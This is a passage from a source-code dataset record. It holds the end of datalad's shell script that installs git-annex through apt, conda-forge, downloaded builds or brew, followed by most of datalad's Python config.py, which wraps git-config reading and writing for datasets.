PATH=\"$_annex_bin:$PATH\"\n}\n\n_conda_annex_version=\nscenario=\"conda-forge\"\nadjust_bashrc=\nurl=\nwhile [ $# != 0 ]; do\n case \"$1\" in\n --adjust-bashrc)\n adjust_bashrc=1\n shift\n ;;\n --help)\n _usage\n exit 0\n ;;\n -*)\n _usage\n exit 1\n ;;\n *)\n scenario=\"$1\"\n shift\n case \"$scenario\" in\n neurodebian|neurodebian-devel|autobuild|snapshot|datalad-extensions-build|brew)\n ;;\n conda-forge|conda-forge-last)\n if [ -n \"$1\" ]; then\n _conda_annex_version=\"=$1\"\n shift\n fi\n ;;\n deb-url)\n url=\"${1?deb-url scheme requires URL}\"\n shift\n ;;\n *)\n echo \"Unknown git-annex installation scheme '$scenario'\" >&2\n echo \"Known schemes:\" >&2\n _show_schemes >&2\n exit 1\n ;;\n esac\n if [ -n \"$1\" ]; then\n # There are unexpected arguments left over.\n _usage\n exit 1\n fi\n ;;\n esac\ndone\n\n_this_dir=$(dirname \"$0\")\n\n# Most common location of installation - /usr/bin\n_annex_bin=/usr/bin\n\n_PATH_OLD=\"$PATH\"\n\n# we do not want to `cd` anywhere but all temp stuff should get unique temp prefix\n_TMPDIR=$(mktemp -d \"${TMPDIR:-/tmp}/ga-XXXXXXX\")\necho \"I: top directory $_TMPDIR\"\n\ncase \"$scenario\" in\n neurodebian) # TODO: use nd_freeze_install for an arbitrary version specified\n # we assume neurodebian is generally configured\n sudo apt-get install git-annex-standalone\n ;;\n neurodebian-devel)\n # if debian-devel is not setup -- set it up\n apt-cache policy git-annex-standalone | grep -q '/debian-devel ' \\\n || setup_neurodebian_devel\n # check versions\n # devel:\n devel_annex_version=$(apt-cache policy git-annex-standalone | grep -B1 '/debian-devel ' | awk '/ndall/{print $1;}')\n current_annex_version=$(apt-cache policy git-annex-standalone | awk '/\\*\\*\\*/{print $2}')\n\n if dpkg --compare-versions \"$devel_annex_version\" gt \"$current_annex_version\"; then\n sudo apt-get install \"git-annex-standalone=$devel_annex_version\"\n else\n echo \"I: devel version $devel_annex_version is not newer than installed $current_annex_version\"\n exit 0\n fi\n ;;\n deb-url)\n (\n wget -O \"$_TMPDIR/git-annex.deb\" \"$url\"\n sudo dpkg -i \"$_TMPDIR/git-annex.deb\"\n )\n ;;\n autobuild|snapshot)\n case \"$(uname)\" in\n Linux)\n _annex_bin=\"$_TMPDIR/git-annex.linux\"\n echo \"I: downloading and extracting under $_annex_bin\"\n case \"$scenario\" in\n autobuild)\n _subpath=autobuild/amd64\n ;;\n snapshot)\n _subpath=linux/current\n ;;\n *)\n echo \"E: internal error: scenario '$scenario' should not reach here\" >&2\n exit 1\n ;;\n esac\n tar -C \"$_TMPDIR\" -xzf <(\n wget -q -O- https://downloads.kitenet.net/git-annex/$_subpath/git-annex-standalone-amd64.tar.gz\n )\n export PATH=\"${_annex_bin}:$PATH\"\n ;;\n Darwin)\n case \"$scenario\" in\n autobuild)\n _subpath=autobuild/x86_64-apple-yosemite\n ;;\n snapshot)\n _subpath=OSX/current/10.10_Yosemite\n ;;\n *)\n echo \"E: internal error: scenario '$scenario' should not reach here\" >&2\n exit 1\n ;;\n esac\n wget -q -O \"$_TMPDIR/git-annex.dmg\" https://downloads.kitenet.net/git-annex/$_subpath/git-annex.dmg\n install_from_dmg \"$_TMPDIR\"/*.dmg\n ;;\n *)\n echo \"E: Unsupported OS: $(uname)\"\n exit 1\n ;;\n esac\n ;;\n conda-forge|conda-forge-last)\n _miniconda_script=Miniconda3-latest-Linux-x86_64.sh\n _conda_bin=\"$_TMPDIR/miniconda/bin\"\n # we will symlink git-annex only under a didicated directory, so it could be\n # used with default Python etc. If names changed here, possibly adjust hardcoded\n # duplicates below where we establish relative symlinks\n _annex_bin=\"$_TMPDIR/annex-bin\"\n case \"$scenario\" in\n conda-forge-last)\n if hash git-annex; then\n echo \"W: git annex already installed. In this case this setup has no sense\" >&2\n exit 1\n fi\n # We are interested only to get git-annex into our environment\n # So to not interfere with \"system wide\" Python etc, we will add miniconda at the\n # end of the path\n export PATH=\"$PATH:${_annex_bin}\";;\n conda-forge)\n export PATH=\"${_annex_bin}:$PATH\";;\n *)\n echo \"E: internal error - $scenario is unknown\"\n exit 1;;\n esac\n\n echo \"I: downloading and running miniconda installer\"\n wget -q -O \"$_TMPDIR/${_miniconda_script}\" \\\n \"${ANACONDA_URL:-https://repo.anaconda.com/miniconda/}${_miniconda_script}\"\n HOME=\"$_TMPDIR\" bash \"$_TMPDIR/${_miniconda_script}\" -b -p \"$_TMPDIR/miniconda\"\n \"${_conda_bin}/conda\" install -q -c conda-forge -y \"git-annex${_conda_annex_version}\"\n\n if [[ \"$_annex_bin\" != \"$_conda_bin\" ]]; then\n mkdir -p \"$_annex_bin\"\n (\n cd \"$_annex_bin\" || exit 1\n ln -s ../miniconda/bin/git-annex* .\n )\n fi\n unset _miniconda_script\n unset _conda_bin\n unset _conda_annex_version\n ;;\n datalad-extensions-build)\n case \"$(uname)\" in\n Linux)\n TARGET_PATH=\"$_TMPDIR\" \"$_this_dir/download-latest-artifact\"\n sudo dpkg -i \"$_TMPDIR\"/*.deb\n ;;\n Darwin)\n TARGET_PATH=\"$_TMPDIR\" TARGET_ARTIFACT=git-annex-macos-dmg \"$_this_dir/download-latest-artifact\"\n install_from_dmg \"$_TMPDIR\"/*.dmg\n ;;\n *)\n echo \"E: Unsupported OS: $(uname)\"\n exit 1\n ;;\n esac\n ;;\n brew)\n brew install git-annex\n _annex_bin=/usr/local/bin\n ;;\n *)\n echo \"E: internal error: '$scenario' should be handled above\" >&2\n exit 1\nesac\n\nif [ -n \"$adjust_bashrc\" ]; then\n # If PATH was changed, we need to make it available to SSH commands.\n # Note: Prepending is necessary. SSH commands load .bashrc, but many\n # distributions (including Debian and Ubuntu) come with a snippet to exit\n # early in that case.\n if [ \"$PATH\" != \"$_PATH_OLD\" ]; then\n perl -pli -e 'print \"PATH=\\\"$ENV{PATH}\\\"\" if $. == 1' ~/.bashrc\n echo \"I: Adjusted first line of ~/.bashrc:\"\n head -n1 ~/.bashrc\n fi\nfi\n\n# Rudimentary test of installation and inform user about location\ntest -x \"${_annex_bin}/git-annex\"\ntest -x \"${_annex_bin}/git-annex-shell\"\necho \"I: git-annex is available under '${_annex_bin}'\"\n\nunset _annex_bin\nunset _show_schemes\nunset _this_dir\n" }, { "alpha_fraction": 0.5758585929870605, "alphanum_fraction": 0.5772457718849182, "avg_line_length": 37.29905700683594, "blob_id": "fc758baa22c2936333829d6fc600567eef7edcc3", "content_id": "0e9ed23432e865d78f94d49c49a24bc25f872856", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 44695, "license_type": "permissive", "max_line_length": 98, "num_lines": 1167, "path": "/datalad/config.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\"\"\"\n\nimport json\nimport logging\nimport os\nimport re\nimport threading\nimport warnings\nfrom collections import namedtuple\nfrom fasteners import InterProcessLock\nfrom functools import (\n lru_cache,\n wraps,\n)\nfrom pathlib import Path\n\n\nimport datalad\nfrom datalad.consts import DATASET_CONFIG_FILE\nfrom datalad.runner import (\n CommandError,\n GitRunner,\n KillOutput,\n StdOutErrCapture,\n)\nfrom datalad.utils import (\n getpwd,\n on_windows,\n)\n\nlgr = logging.getLogger('datalad.config')\n\n# git-config key syntax with a section and a subsection\n# see git-config(1) for syntax details\ncfg_k_regex = re.compile(r'([a-zA-Z0-9-.]+\\.[^\\0\\n]+)$', flags=re.MULTILINE)\n# identical to the key regex, but with an additional group for a\n# value in a null-delimited git-config dump\ncfg_kv_regex = re.compile(\n r'([a-zA-Z0-9-.]+\\.[^\\0\\n]+)\\n(.*)$',\n flags=re.MULTILINE | re.DOTALL\n)\ncfg_section_regex = re.compile(r'(.*)\\.[^.]+')\ncfg_sectionoption_regex = re.compile(r'(.*)\\.([^.]+)')\n\n\n_scope_reload_doc = \"\"\"\n scope : {'branch', 'local', 'global', 'override'}, optional\n Indicator which configuration file to modify. 'branch' indicates the\n persistent configuration in .datalad/config of a dataset; 'local'\n the configuration of a dataset's Git repository in .git/config;\n 'global' refers to the general configuration that is not specific to\n a single repository (usually in $USER/.gitconfig); 'override'\n limits the modification to the ConfigManager instance, and the\n assigned value overrides any setting from any other source.\n Note: 'dataset' is being DEPRECATED in favor of 'branch'.\n where: {'branch', 'local', 'global', 'override'}, optional\n DEPRECATED, use 'scope'.\n reload : bool\n Flag whether to reload the configuration from file(s) after\n modification. This can be disable to make multiple sequential\n modifications slightly more efficient.\"\"\".lstrip()\n\n# Selection of os.stat_result fields we care to collect/compare to judge\n# on either file has changed to warrant reload of configuration.\n_stat_result = namedtuple('_stat_result', 'st_ino st_size st_ctime st_mtime')\n\n\n# we cannot import external_versions here, as the cfg comes before anything\n# and we would have circular imports\n@lru_cache()\ndef get_git_version(runner=None):\n \"\"\"Return version of available git\"\"\"\n runner = runner or GitRunner()\n return runner.run('git version'.split(),\n protocol=StdOutErrCapture)['stdout'].split()[2]\n\n\ndef _scope_reload(obj):\n \"\"\"Helper decorator to simplify providing repetitive docstring\"\"\"\n obj.__doc__ = obj.__doc__ % _scope_reload_doc\n return obj\n\n\n#\n# TODO: remove when deprecated 'where' is removed. Some time >= 0.17\n#\ndef _where_to_scope(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n if 'where' in kwargs:\n if 'scope' in kwargs:\n raise ValueError(\"Do not specify both 'scope' and DEPRECATED 'where'\")\n kwargs = kwargs.copy()\n where = kwargs.pop('where')\n if where == 'dataset':\n warnings.warn(\"'where=\\\"dataset\\\"' is deprecated, use 'scope=\\\"branch\\\"' instead\",\n DeprecationWarning)\n where = 'branch'\n else:\n warnings.warn(\"'where' is deprecated, use 'scope' instead\",\n DeprecationWarning)\n kwargs['scope'] = where\n return func(*args, **kwargs)\n return wrapper\n\n\ndef parse_gitconfig_dump(dump, cwd=None, multi_value=True):\n \"\"\"Parse a dump-string from `git config -z --list`\n\n This parser has limited support for discarding unrelated output\n that may contaminate the given dump. It does so performing a\n relatively strict matching of configuration key syntax, and discarding\n lines in the output that are not valid git-config keys.\n\n There is also built-in support for parsing outputs generated\n with --show-origin (see return value).\n\n Parameters\n ----------\n dump : str\n Null-byte separated output\n cwd : path-like, optional\n Use this absolute path to convert relative paths for origin reports\n into absolute paths. By default, the process working directory\n PWD is used.\n multi_value : bool, optional\n If True, report values from multiple specifications of the\n same key as a tuple of values assigned to this key. Otherwise,\n the last configuration is reported.\n\n Returns:\n --------\n dict, set\n Configuration items are returned as key/value pairs in a dictionary.\n The second tuple-item will be a set of identifiers comprising all\n source files/blobs, if origin information was included\n in the dump (--show-origin). An empty set is returned otherwise.\n For actual files a Path object is included in the set, for a git-blob\n a Git blob ID prefixed with 'blob:' is reported.\n \"\"\"\n cwd = Path(getpwd() if cwd is None else cwd)\n dct = {}\n fileset = set()\n for line in dump.split('\\0'):\n # line is a null-delimited chunk\n k = None\n # in anticipation of output contamination, process within a loop\n # where we can reject non syntax compliant pieces\n while line:\n if line.startswith('file:') or line.startswith('blob:'):\n fileset.add(line)\n break\n if line.startswith('command line:'):\n # no origin that we could as a pathobj\n break\n # try getting key/value pair from the present chunk\n k, v = _gitcfg_rec_to_keyvalue(line)\n if k is not None:\n # we are done with this chunk when there is a good key\n break\n # discard the first line and start over\n ignore, line = line.split('\\n', maxsplit=1)\n lgr.debug('Non-standard git-config output, ignoring: %s', ignore)\n if not k:\n # nothing else to log, all ignored dump was reported before\n continue\n # multi-value reporting\n present_v = dct.get(k, None)\n if present_v is None or not multi_value:\n dct[k] = v\n else:\n if isinstance(present_v, tuple):\n dct[k] = present_v + (v,)\n else:\n dct[k] = (present_v, v)\n # take blobs with verbatim markup\n origin_blobs = set(f for f in fileset if f.startswith('blob:'))\n # convert file specifications to Path objects with absolute paths\n origin_paths = set(Path(f[5:]) for f in fileset if f.startswith('file:'))\n origin_paths = set(f if f.is_absolute() else cwd / f for f in origin_paths)\n return dct, origin_paths.union(origin_blobs)\n\n\n# keep alias with previous name for now\n_parse_gitconfig_dump = parse_gitconfig_dump\n\n\ndef _gitcfg_rec_to_keyvalue(rec):\n \"\"\"Helper for parse_gitconfig_dump()\n\n Parameters\n ----------\n rec: str\n Key/value specification string\n\n Returns\n -------\n str, str\n Parsed key and value. Key and/or value could be None\n if not syntax-compliant (former) or absent (latter).\n \"\"\"\n kv_match = cfg_kv_regex.match(rec)\n if kv_match:\n k, v = kv_match.groups()\n elif cfg_k_regex.match(rec):\n # could be just a key without = value, which git treats as True\n # if asked for a bool\n k, v = rec, None\n else:\n # no value, no good key\n k = v = None\n return k, v\n\n\ndef _update_from_env(store):\n overrides = {}\n dct = {}\n for k in os.environ:\n if k == \"DATALAD_CONFIG_OVERRIDES_JSON\":\n try:\n overrides = json.loads(os.environ[k])\n except json.decoder.JSONDecodeError as exc:\n lgr.warning(\"Failed to load DATALAD_CONFIG_OVERRIDES_JSON: %s\",\n exc)\n elif k.startswith('DATALAD_'):\n dct[k.replace('__', '-').replace('_', '.').lower()] = os.environ[k]\n if overrides:\n store.update(overrides)\n store.update(dct)\n\n\ndef anything2bool(val):\n if hasattr(val, 'lower'):\n val = val.lower()\n if val in {\"off\", \"no\", \"false\", \"0\"} or not bool(val):\n return False\n elif val in {\"on\", \"yes\", \"true\", True} \\\n or (hasattr(val, 'isdigit') and val.isdigit() and int(val)) \\\n or isinstance(val, int) and val:\n return True\n else:\n raise TypeError(\n \"Got value %s which could not be interpreted as a boolean\"\n % repr(val))\n\n\nclass ConfigManager(object):\n \"\"\"Thin wrapper around `git-config` with support for a dataset configuration.\n\n The general idea is to have an object that is primarily used to read/query\n configuration option. Upon creation, current configuration is read via one\n (or max two, in the case of the presence of dataset-specific configuration)\n calls to `git config`. If this class is initialized with a Dataset\n instance, it supports reading and writing configuration from\n ``.datalad/config`` inside a dataset too. This file is committed to Git and\n hence useful to ship certain configuration items with a dataset.\n\n The API aims to provide the most significant read-access API of a\n dictionary, the Python ConfigParser, and GitPython's config parser\n implementations.\n\n This class is presently not capable of efficiently writing multiple\n configurations items at once. Instead, each modification results in a\n dedicated call to `git config`. This author thinks this is OK, as he\n cannot think of a situation where a large number of items need to be\n written during normal operation.\n\n Each instance carries a public `overrides` attribute. This dictionary\n contains variables that override any setting read from a file. The overrides\n are persistent across reloads.\n\n Any DATALAD_* environment variable is also presented as a configuration\n item. Settings read from environment variables are not stored in any of the\n configuration files, but are read dynamically from the environment at each\n `reload()` call. Their values take precedence over any specification in\n configuration files, and even overrides.\n\n Parameters\n ----------\n dataset : Dataset, optional\n If provided, all `git config` calls are executed in this dataset's\n directory. Moreover, any modifications are, by default, directed to\n this dataset's configuration file (which will be created on demand)\n overrides : dict, optional\n Variable overrides, see general class documentation for details.\n source : {'any', 'local', 'branch', 'branch-local'}, optional\n Which sources of configuration setting to consider. If 'branch',\n configuration items are only read from a dataset's persistent\n configuration file in current branch, if any is present\n (the one in ``.datalad/config``, not\n ``.git/config``); if 'local', any non-committed source is considered\n (local and global configuration in Git config's terminology);\n if 'branch-local', persistent configuration in current dataset branch\n and local, but not global or system configuration are considered; if 'any'\n all possible sources of configuration are considered.\n Note: 'dataset' and 'dataset-local' are deprecated in favor of 'branch'\n and 'branch-local'.\n \"\"\"\n # Lock for running changing operation across multiple threads.\n # Since config itself to the same path could\n # potentially be created independently in multiple threads, and we might be\n # modifying global config as well, making lock static should not allow more than\n # one thread to write at a time, even if to different repositories.\n _run_lock = threading.Lock()\n\n def __init__(self, dataset=None, overrides=None, source='any'):\n # TODO: remove along with the removal of deprecated 'where'\n if source in ('dataset', 'dataset-local'):\n source_new = source.replace('dataset', 'branch')\n warnings.warn(\"'source=\\\"%s\\\"' is deprecated, use 'source=\\\"%s\\\"' instead\"\n % (source, source_new),\n DeprecationWarning)\n source = source_new\n\n if source not in ('any', 'local', 'branch', 'branch-local'):\n raise ValueError(\n 'Unknown ConfigManager(source=) setting: {}'.format(source))\n store = dict(\n # store in a simple dict\n # no subclassing, because we want to be largely read-only, and implement\n # config writing separately\n cfg={},\n # track the files that jointly make up the config in this store\n files=set(),\n # and their modification times to be able to avoid needless unforced reloads\n stats=None,\n )\n self._stores = dict(\n # populated with info from git\n git=store,\n # only populated with info from committed dataset config\n branch=store.copy(),\n )\n # merged representation (the only one that existed pre datalad 0.14)\n # will be built on initial reload\n self._merged_store = {}\n\n self._repo_dot_git = None\n self._repo_pathobj = None\n if dataset:\n if hasattr(dataset, 'dot_git'):\n # `dataset` is actually a Repo instance\n self._repo_dot_git = dataset.dot_git\n self._repo_pathobj = dataset.pathobj\n elif dataset.repo:\n self._repo_dot_git = dataset.repo.dot_git\n self._repo_pathobj = dataset.repo.pathobj\n\n self._config_cmd = ['git', 'config']\n # public dict to store variables that always override any setting\n # read from a file\n # `hasattr()` is needed because `datalad.cfg` is generated upon first module\n # import, hence when this code runs first, there cannot be any config manager\n # to inherit from\n self.overrides = datalad.cfg.overrides.copy() if hasattr(datalad, 'cfg') else {}\n if overrides is not None:\n self.overrides.update(overrides)\n if dataset is None:\n if source in ('branch', 'branch-local'):\n raise ValueError(\n 'ConfigManager configured to read from a branch of a dataset only, '\n 'but no dataset given')\n # The caller didn't specify a repository. Unfortunately there is\n # no known way to tell git to ignore possible local git repository,\n # and unsetting of --git-dir could cause other problems.\n # See https://lore.kernel.org/git/[email protected]/T/ .\n # Setting the git directory to /dev/null or on Windows analogous nul file\n # (could be anywhere, see https://stackoverflow.com/a/27773642/1265472)\n # see allow to achieve the goal to prevent a repository in the current\n # working directory from leaking configuration into the output.\n nul = 'b:\\\\nul' if on_windows else '/dev/null'\n self._config_cmd = ['git', f'--git-dir={nul}', 'config']\n\n self._src_mode = source\n run_kwargs = dict()\n self._runner = None\n if dataset is not None:\n if hasattr(dataset, '_git_runner'):\n # `dataset` is actually a Repo instance\n self._runner = dataset._git_runner\n elif dataset.repo:\n self._runner = dataset.repo._git_runner\n else:\n # make sure we run the git config calls in the dataset\n # to pick up the right config files\n run_kwargs['cwd'] = dataset.path\n if self._runner is None:\n self._runner = GitRunner(**run_kwargs)\n\n self.reload(force=True)\n\n def reload(self, force=False):\n \"\"\"Reload all configuration items from the configured sources\n\n If `force` is False, all files configuration was previously read from\n are checked for differences in the modification times. If no difference\n is found for any file no reload is performed. This mechanism will not\n detect newly created global configuration files, use `force` in this case.\n \"\"\"\n run_args = ['-z', '-l', '--show-origin']\n\n # update from desired config sources only\n # 2-step strategy:\n # - load datalad dataset config from dataset\n # - load git config from all supported by git sources\n # in doing so we always stay compatible with where Git gets its\n # config from, but also allow to override persistent information\n # from dataset locally or globally\n\n # figure out what needs to be reloaded at all\n to_run = {}\n # committed branch config\n # well, actually not necessarily committed\n\n if self._src_mode != 'local' and self._repo_pathobj:\n # we have to read the branch config from this existing repo\n if self._repo_dot_git == self._repo_pathobj:\n # this is a bare repo, we go with the default HEAD,\n # if it has a config\n try:\n # will blow if absent\n self._runner.run([\n 'git', 'cat-file', '-e', 'HEAD:.datalad/config'],\n protocol=KillOutput)\n to_run['branch'] = run_args + [\n '--blob', 'HEAD:.datalad/config']\n except CommandError:\n # all good, just no branch config\n pass\n else:\n # non-bare repo\n # we could use the same strategy as for bare repos, and rely\n # on the committed config, however, for now we must pay off\n # the sins of the past and work with the file at hand\n dataset_cfgfile = self._repo_pathobj / DATASET_CONFIG_FILE\n if dataset_cfgfile.exists() and (\n force or self._need_reload(self._stores['branch'])):\n # we have the file and are forced or encourages to (re)load\n to_run['branch'] = run_args + [\n '--file', str(dataset_cfgfile)]\n\n if self._src_mode != 'branch' and (\n force or self._need_reload(self._stores['git'])):\n to_run['git'] = run_args + ['--local'] \\\n if self._src_mode == 'branch-local' \\\n else run_args\n\n # reload everything that was found todo\n while to_run:\n store_id, runargs = to_run.popitem()\n self._stores[store_id] = self._reload(runargs)\n\n # always update the merged representation, even if we did not reload\n # anything from a file. ENV or overrides could change independently\n # start with the commit dataset config\n merged = self._stores['branch']['cfg'].copy()\n # local config always takes precedence\n merged.update(self._stores['git']['cfg'])\n # superimpose overrides\n merged.update(self.overrides)\n # override with environment variables, unless we only want to read the\n # dataset's commit config\n if self._src_mode != 'branch':\n _update_from_env(merged)\n self._merged_store = merged\n\n def _need_reload(self, store):\n storestats = store['stats']\n if not storestats:\n return True\n\n # we have read files before\n # check if any file we read from has changed\n curstats = self._get_stats(store)\n return any(curstats[f] != storestats[f] for f in store['files'])\n\n def _reload(self, run_args):\n # query git-config\n stdout, stderr = self._run(\n run_args,\n protocol=StdOutErrCapture,\n # always expect git-config to output utf-8\n encoding='utf-8',\n )\n store = {}\n store['cfg'], store['files'] = parse_gitconfig_dump(\n stdout, cwd=self._runner.cwd)\n\n # update stats of config files, they have just been discovered\n # and should still exist\n store['stats'] = self._get_stats(store)\n return store\n\n def _get_stats(self, store):\n stats = {}\n for f in store['files']:\n if isinstance(f, Path):\n if f.exists():\n stat = f.stat()\n stats[f] = _stat_result(\n stat.st_ino,\n stat.st_size,\n stat.st_ctime,\n stat.st_mtime)\n else:\n stats[f] = None\n elif f.startswith('blob:'):\n # we record the specific shasum of the blob\n stats[f] = self._runner.run(\n ['git', 'rev-parse', f[5:]],\n protocol=StdOutErrCapture)['stdout'].strip()\n else:\n stats[f] = None\n return stats\n\n @_scope_reload\n @_where_to_scope\n def obtain(self, var, default=None, dialog_type=None, valtype=None,\n store=False, scope=None, reload=True, **kwargs):\n \"\"\"\n Convenience method to obtain settings interactively, if needed\n\n A UI will be used to ask for user input in interactive sessions.\n Questions to ask, and additional explanations can be passed directly\n as arguments, or retrieved from a list of pre-configured items.\n\n Additionally, this method allows for type conversion and storage\n of obtained settings. Both aspects can also be pre-configured.\n\n Parameters\n ----------\n var : str\n Variable name including any section like `git config` expects them,\n e.g. 'core.editor'\n default : any type\n In interactive sessions and if `store` is True, this default value\n will be presented to the user for confirmation (or modification).\n In all other cases, this value will be silently assigned unless\n there is an existing configuration setting.\n dialog_type : {'question', 'yesno', None}\n Which dialog type to use in interactive sessions. If `None`,\n pre-configured UI options are used.\n store : bool\n Whether to store the obtained value (or default)\n %s\n `**kwargs`\n Additional arguments for the UI function call, such as a question\n `text`.\n \"\"\"\n # do local import, as this module is import prominently and the\n # could theoretically import all kind of weird things for type\n # conversion\n from datalad.interface.common_cfg import definitions as cfg_defs\n\n # fetch what we know about this variable\n cdef = cfg_defs.get(var, {})\n # type conversion setup\n if valtype is None and 'type' in cdef:\n valtype = cdef['type']\n if valtype is None:\n valtype = lambda x: x\n\n # any default?\n if default is None and 'default' in cdef:\n default = cdef['default']\n\n _value = None\n if var in self:\n # nothing needs to be obtained, it is all here already\n _value = self[var]\n elif store is False and default is not None:\n # nothing will be stored, and we have a default -> no user confirmation\n # we cannot use logging, because we want to use the config to configure\n # the logging\n #lgr.debug('using default {} for config setting {}'.format(default, var))\n _value = default\n\n if _value is not None:\n # we got everything we need and can exit early\n try:\n return valtype(_value)\n except Exception as e:\n raise ValueError(\n \"value '{}' of existing configuration for '{}' cannot be \"\n \"converted to the desired type '{}' ({})\".format(\n _value, var, valtype, e)) from e\n\n # now we need to try to obtain something from the user\n from datalad.ui import ui\n\n # configure UI\n dialog_opts = kwargs\n if dialog_type is None: # no override\n # check for common knowledge on how to obtain a value\n if 'ui' in cdef:\n dialog_type = cdef['ui'][0]\n # pull standard dialog settings\n dialog_opts = cdef['ui'][1]\n # update with input\n dialog_opts.update(kwargs)\n\n if (not ui.is_interactive or dialog_type is None) and default is None:\n raise RuntimeError(\n \"cannot obtain value for configuration item '{}', \"\n \"not preconfigured, no default, no UI available\".format(var))\n\n if not hasattr(ui, dialog_type):\n raise ValueError(\"UI '{}' does not support dialog type '{}'\".format(\n ui, dialog_type))\n\n # configure storage destination, if needed\n if store:\n if scope is None and 'destination' in cdef:\n scope = cdef['destination']\n if scope is None:\n raise ValueError(\n \"request to store configuration item '{}', but no \"\n \"storage destination specified\".format(var))\n\n # obtain via UI\n dialog = getattr(ui, dialog_type)\n _value = dialog(default=default, **dialog_opts)\n\n if _value is None:\n # we got nothing\n if default is None:\n raise RuntimeError(\n \"could not obtain value for configuration item '{}', \"\n \"not preconfigured, no default\".format(var))\n # XXX maybe we should return default here, even it was returned\n # from the UI -- if that is even possible\n\n # execute type conversion before storing to check that we got\n # something that looks like what we want\n try:\n value = valtype(_value)\n except Exception as e:\n raise ValueError(\n \"cannot convert user input `{}` to desired type ({})\".format(\n _value, e)) from e\n # XXX we could consider \"looping\" until we have a value of proper\n # type in case of a user typo...\n\n if store:\n # store value as it was before any conversion, needs to be str\n # anyway\n # needs string conversion nevertheless, because default could come\n # in as something else\n self.add(var, '{}'.format(_value), scope=scope, reload=reload)\n return value\n\n def __repr__(self):\n # give full list of all tracked config files, plus overrides\n return \"ConfigManager({}{})\".format(\n [str(p) for p in self._stores['branch']['files'].union(\n self._stores['git']['files'])],\n ', overrides={!r}'.format(self.overrides) if self.overrides else '',\n )\n\n def __str__(self):\n # give path of dataset, if there is any, plus overrides\n return \"ConfigManager({}{})\".format(\n self._repo_pathobj if self._repo_pathobj else '',\n 'with overrides' if self.overrides else '',\n )\n\n #\n # Compatibility with dict API\n #\n def __len__(self):\n return len(self._merged_store)\n\n def __getitem__(self, key):\n return self._merged_store.__getitem__(key)\n\n def __contains__(self, key):\n return self._merged_store.__contains__(key)\n\n def keys(self):\n \"\"\"Returns list of configuration item names\"\"\"\n return self._merged_store.keys()\n\n # XXX should this be *args?\n def get(self, key, default=None, get_all=False):\n \"\"\"D.get(k[,d]) -> D[k] if k in D, else d. d defaults to None.\n\n Parameters\n ----------\n default : optional\n Value to return when key is not present. `None` by default.\n get_all : bool, optional\n If True, return all values of multiple identical configuration keys.\n By default only the last specified value is returned.\n \"\"\"\n try:\n val = self[key]\n if get_all or not isinstance(val, tuple):\n return val\n else:\n return val[-1]\n except KeyError:\n # return as-is, default could be a tuple, hence do not subject to\n # get_all processing\n return default\n\n def get_from_source(self, source, key, default=None):\n \"\"\"Like get(), but a source can be specific.\n\n If `source` is 'branch', only the committed configuration is queried,\n overrides are applied. In the case of 'local', the committed\n configuration is ignored, but overrides and configuration from\n environment variables are applied as usual.\n \"\"\"\n # TODO: remove along with the removal of deprecated 'where'\n if source == 'dataset':\n warnings.warn(\"'source=\\\"%s\\\"' is deprecated, use 'source=\\\"%s\\\"' instead\"\n % (source, 'branch'),\n DeprecationWarning)\n source = 'branch'\n if source not in ('branch', 'local'):\n raise ValueError(\"source must be 'branch' or 'local'\")\n if source == 'branch':\n return self.overrides.get(\n key,\n self._stores['branch']['cfg'].get(\n key,\n default))\n else:\n if key not in self._stores['branch']['cfg']:\n # the key is not in the committed config, hence we can\n # just report based on the merged representation\n return self.get(key, default)\n else:\n # expensive case, rebuild a config without the committed\n # dataset config contributing\n env = {}\n _update_from_env(env)\n return env.get(\n key,\n self.overrides.get(\n key,\n self._stores['git']['cfg'].get(\n key,\n default)))\n\n #\n # Compatibility with ConfigParser API\n #\n def sections(self):\n \"\"\"Returns a list of the sections available\"\"\"\n return list(set([cfg_section_regex.match(k).group(1) for k in self._merged_store]))\n\n def options(self, section):\n \"\"\"Returns a list of options available in the specified section.\"\"\"\n opts = []\n for k in self._merged_store:\n sec, opt = cfg_sectionoption_regex.match(k).groups()\n if sec == section:\n opts.append(opt)\n return opts\n\n def has_section(self, section):\n \"\"\"Indicates whether a section is present in the configuration\"\"\"\n for k in self._merged_store:\n if k.startswith(section):\n return True\n return False\n\n def has_option(self, section, option):\n \"\"\"If the given section exists, and contains the given option\"\"\"\n for k in self._merged_store:\n sec, opt = cfg_sectionoption_regex.match(k).groups()\n if sec == section and opt == option:\n return True\n return False\n\n def _get_type(self, typefn, section, option):\n key = '.'.join([section, option])\n # Mimic the handling of get_value(..., default=None), while still going\n # through get() in order to get its default tuple handling.\n if key not in self:\n raise KeyError(key)\n return typefn(self.get(key))\n\n def getint(self, section, option):\n \"\"\"A convenience method which coerces the option value to an integer\"\"\"\n return self._get_type(int, section, option)\n\n def getfloat(self, section, option):\n \"\"\"A convenience method which coerces the option value to a float\"\"\"\n return self._get_type(float, section, option)\n\n def getbool(self, section, option, default=None):\n \"\"\"A convenience method which coerces the option value to a bool\n\n Values \"on\", \"yes\", \"true\" and any int!=0 are considered True\n Values which evaluate to bool False, \"off\", \"no\", \"false\" are considered\n False\n TypeError is raised for other values.\n \"\"\"\n key = '.'.join([section, option])\n # Mimic the handling of get_value(..., default=None), while still going\n # through get() in order to get its default tuple handling.\n if default is None and key not in self:\n raise KeyError(key)\n val = self.get(key, default=default)\n if val is None: # no value at all, git treats it as True\n return True\n return anything2bool(val)\n\n # this is a hybrid of ConfigParser and dict API\n def items(self, section=None):\n \"\"\"Return a list of (name, value) pairs for each option\n\n Optionally limited to a given section.\n \"\"\"\n if section is None:\n return self._merged_store.items()\n return [(k, v) for k, v in self._merged_store.items()\n if cfg_section_regex.match(k).group(1) == section]\n\n #\n # Compatibility with GitPython's ConfigParser\n #\n def get_value(self, section, option, default=None):\n \"\"\"Like `get()`, but with an optional default value\n\n If the default is not None, the given default value will be returned in\n case the option did not exist. This behavior imitates GitPython's\n config parser.\n \"\"\"\n try:\n return self['.'.join((section, option))]\n except KeyError as e:\n # this strange dance is needed because gitpython does it this way\n if default is not 